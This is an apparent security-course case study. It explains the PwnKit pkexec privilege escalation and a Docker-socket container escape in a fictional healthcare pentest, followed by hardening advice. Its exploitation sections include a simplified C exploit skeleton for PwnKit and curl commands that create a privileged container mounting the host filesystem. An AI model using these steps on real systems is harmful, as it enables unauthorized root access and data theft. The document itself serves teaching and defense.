Case Study 2: PwnKit (CVE-2021-4034) and Container Escapes in Production

When Polkit Met Root, and Containers Failed to Contain


Part I: PwnKit --- Twelve Years of Root in Plain Sight

Overview

In January 2022, the Qualys Research Team disclosed CVE-2021-4034, dubbed "PwnKit"---a local privilege escalation vulnerability in polkit's pkexec utility that had existed since its first release in May 2009. For over twelve years, every major Linux distribution shipped with a binary that any local user could exploit to gain root access. The vulnerability was trivially exploitable, worked on default installations, and required no special configuration.

What Is Polkit?

PolicyKit (polkit) is an authorization framework used by Linux distributions to manage privileges for unprivileged processes. The pkexec component allows an authorized user to execute a program as another user---similar to sudo but integrated with the desktop policy framework. Critically, pkexec is installed as a SUID-root binary on virtually every Linux system.

The Vulnerability

The vulnerability existed in pkexec's handling of command-line arguments. When pkexec processes its arguments, it uses the argc (argument count) value to iterate through argv (the argument array). However, the C standard allows argc to be 0---meaning a program can be executed with no arguments at all.

When pkexec is called with argc=0:

  1. pkexec reads argv[0], which is normally the program name. With argc=0, argv[0] is NULL, but the code reads past the end of argv into the envp array (environment variables), treating the first environment variable as the program path.

  2. pkexec then calls g_find_program_in_path() to resolve the "program name" (actually the first environment variable) to a full path.

  3. The resolved path is written back to argv[1]---but since argv has zero elements, this actually writes into envp[0], allowing the attacker to inject an environment variable.

  4. By carefully constructing the environment, an attacker can inject a value like GCONV_PATH=/tmp/exploit into the environment of the SUID-root pkexec process.

  5. The GCONV_PATH environment variable controls where glibc looks for character conversion modules. By pointing it to an attacker-controlled directory containing a malicious shared library, the attacker achieves code execution as root.

Exploitation

The exploit is remarkably simple and reliable:

// Simplified PwnKit exploit concept
// The actual exploit involves:
// 1. Creating a malicious gconv-modules file
// 2. Creating a malicious shared library
// 3. Setting up the environment to trigger the out-of-bounds write
// 4. Executing pkexec with argc=0 using execve()

int main() {
    // Set up environment for exploitation
    char *envp[] = {
        "exploit",                    // Will become argv[1] via OOB write
        "PATH=GCONV_PATH=/tmp/lol",  // Injected into environment
        "CHARSET=UTF8",
        "SHELL=bash",
        NULL
    };

    // Execute pkexec with argc=0
    // The first envp entry becomes the "program name"
    // The OOB write injects GCONV_PATH
    execve("/usr/bin/pkexec", (char*[]){NULL}, envp);
}

The exploitation was so straightforward that working exploits appeared within hours of disclosure.

Impact and Response

PwnKit affected every Linux distribution that included polkit: - Ubuntu 10.04 through 21.10 - Debian since 2009 - Red Hat/CentOS 6, 7, 8, and 9 - Fedora since 2009 - SUSE/openSUSE since 2009 - Arch Linux and derivatives

Emergency patches were released by all major distributions within 24-48 hours. The immediate mitigation was simple: remove the SUID bit from pkexec:

chmod 0755 /usr/bin/pkexec

The MedSecure Connection

During the MedSecure penetration test, the team found that several development and staging servers had not been patched for PwnKit months after disclosure. One staging server running Ubuntu 18.04 had pkexec with the SUID bit still set:

www-data@medsecure-staging:~$ ls -la /usr/bin/pkexec
-rwsr-xr-x 1 root root 22520 Mar 31 2021 /usr/bin/pkexec

www-data@medsecure-staging:~$ ./pwnkit
# id
uid=0(root) gid=0(root)

The escalation took less than a second. The finding highlighted a systemic failure: MedSecure's patch management process did not adequately cover non-production systems, which often contain copies of production data for testing purposes.


Part II: Container Escapes in MedSecure's Kubernetes Environment

The Scenario

MedSecure's modern patient portal runs in a Kubernetes cluster on AWS EKS. The development team containerized the application for scalability and what they believed was improved security. During the penetration test, the team discovered that the container security posture had critical gaps.

Discovery: Docker Socket Exposure

After gaining initial access to a pod through a server-side request forgery (SSRF) vulnerability in the patient portal API, the team enumerated the container environment:

# Container detection
www-data@patient-portal-pod:/$ ls -la /.dockerenv
-rwxr-xr-x 1 root root 0 Jan 15 10:23 /.dockerenv

# Kubernetes service account
www-data@patient-portal-pod:/$ ls /var/run/secrets/kubernetes.io/serviceaccount/
ca.crt  namespace  token

# Critical finding: Docker socket mounted
www-data@patient-portal-pod:/$ ls -la /var/run/docker.sock
srw-rw---- 1 root 999 0 Jan 15 10:00 /var/run/docker.sock

The Docker socket was mounted into the pod---a dangerous but common practice used by CI/CD pipelines and monitoring tools. The development team had included it for a container health-check sidecar that needed to inspect other containers.

The Escape

With access to the Docker socket, the escape was straightforward:

# Install curl (or use a pre-compiled static binary)
# Query the Docker API
www-data@patient-portal-pod:/$ curl -s --unix-socket /var/run/docker.sock \
  http://localhost/images/json | head -5

# Create a privileged container mounting the host filesystem
www-data@patient-portal-pod:/$ curl -s --unix-socket /var/run/docker.sock \
  -X POST -H "Content-Type: application/json" \
  -d '{
    "Image":"alpine",
    "Cmd":["/bin/sh"],
    "Mounts":[{"Type":"bind","Source":"/","Target":"/host"}],
    "HostConfig":{"Privileged":true}
  }' \
  http://localhost/containers/create

# Start and attach to the container
# Now we have root on the host via /host

Lateral Movement Through Kubernetes

With host access, the team extracted the kubelet credentials and discovered the Kubernetes service account token had excessive permissions:

# Check permissions
$ kubectl auth can-i --list
Resources   Verbs
*.*         [*]        # Full cluster admin!

The service account had been granted cluster-admin privileges---a catastrophic misconfiguration that gave the team access to every pod, secret, and namespace in the cluster.

Impact Demonstration

From the compromised cluster, the team demonstrated access to:

  1. Database credentials stored in Kubernetes Secrets (base64-encoded, not encrypted)
  2. Patient health records in the database accessed through internal service endpoints
  3. AWS IAM credentials via the Instance Metadata Service (IMDS) accessible from the host
  4. Other microservices including the billing system and prescription management

The complete attack chain: SSRF in web application -> Pod access -> Docker socket -> Host access -> Kubernetes admin -> All patient data.

Root Cause Analysis

Multiple security failures contributed to the breach:

  1. Docker socket mounting: The socket was mounted for a convenience feature (container health checks) without understanding the security implications.
  2. Excessive Kubernetes RBAC: The service account had cluster-admin instead of the minimum necessary permissions.
  3. No Pod Security Policy: The cluster did not enforce pod security standards that would have prevented privileged containers.
  4. Secrets not encrypted: Kubernetes Secrets were stored in etcd without encryption at rest.
  5. No network segmentation: Network policies were not implemented, allowing unrestricted pod-to-pod communication.
  6. IMDS not restricted: The AWS Instance Metadata Service was accessible from pods, allowing credential theft.

🔵 Blue Team Perspective

Container Security Best Practices

Never mount the Docker socket: - Use dedicated monitoring tools that do not require socket access - If socket access is absolutely necessary, use a read-only proxy with strict filtering - Consider alternatives like cri-o or containerd that provide more granular access controls

Kubernetes Hardening: - Implement Pod Security Standards (Restricted profile) - Use RBCD with least privilege---never grant cluster-admin to service accounts - Enable audit logging for all API server operations - Encrypt Secrets at rest using KMS - Implement Network Policies to restrict pod-to-pod communication - Block IMDS access from pods using iptables rules or IMDS v2

Runtime Security: - Deploy Falco or similar runtime security monitoring - Alert on container escapes, privilege escalation attempts, and anomalous network activity - Implement image scanning in CI/CD pipelines - Use distroless or scratch base images to minimize attack surface

PwnKit-Specific Defenses: - Implement automated patch management for all systems, including non-production - Remove SUID bits from binaries that are not strictly necessary - Monitor for new SUID binaries appearing on systems - Use file integrity monitoring for critical system binaries

Discussion Questions

  1. PwnKit existed for twelve years before discovery. What does this tell us about the effectiveness of code review and static analysis for finding memory safety bugs in C code?
  2. Should the Docker socket ever be mounted inside a container? What alternatives exist for common use cases?
  3. How would the MedSecure container escape have been prevented if Pod Security Standards (Restricted) had been enforced?
  4. What is the business impact of a container escape that exposes 500,000 patient health records?
  5. How should organizations balance the convenience of broad Kubernetes RBAC permissions against the security risk?

Key Lessons

  1. Vulnerability age does not equal low risk: Both PwnKit and Dirty COW existed for over a decade. Age does not make a vulnerability safe.
  2. Containers are not a security boundary without additional controls: Docker and Kubernetes provide isolation, but misconfigurations easily defeat it.
  3. Non-production environments need production-level security: Staging servers often contain production data and can serve as pivot points.
  4. Defense in depth is essential: No single control (containers, firewalls, access controls) is sufficient on its own.
  5. The attack chain matters: The combination of individually "minor" issues (SSRF + Docker socket + excessive RBAC) created a critical impact.

References

  • Qualys Security Advisory: "PwnKit: Local Privilege Escalation in polkit's pkexec" (QSA-2022-0002)
  • CVE-2021-4034 National Vulnerability Database Entry
  • Docker Security Best Practices Documentation
  • Kubernetes Pod Security Standards (https://kubernetes.io/docs/concepts/security/pod-security-standards/)
  • Trail of Bits: "Understanding Docker Container Escapes"
  • NIST SP 800-190: Application Container Security Guide
  • CIS Kubernetes Benchmark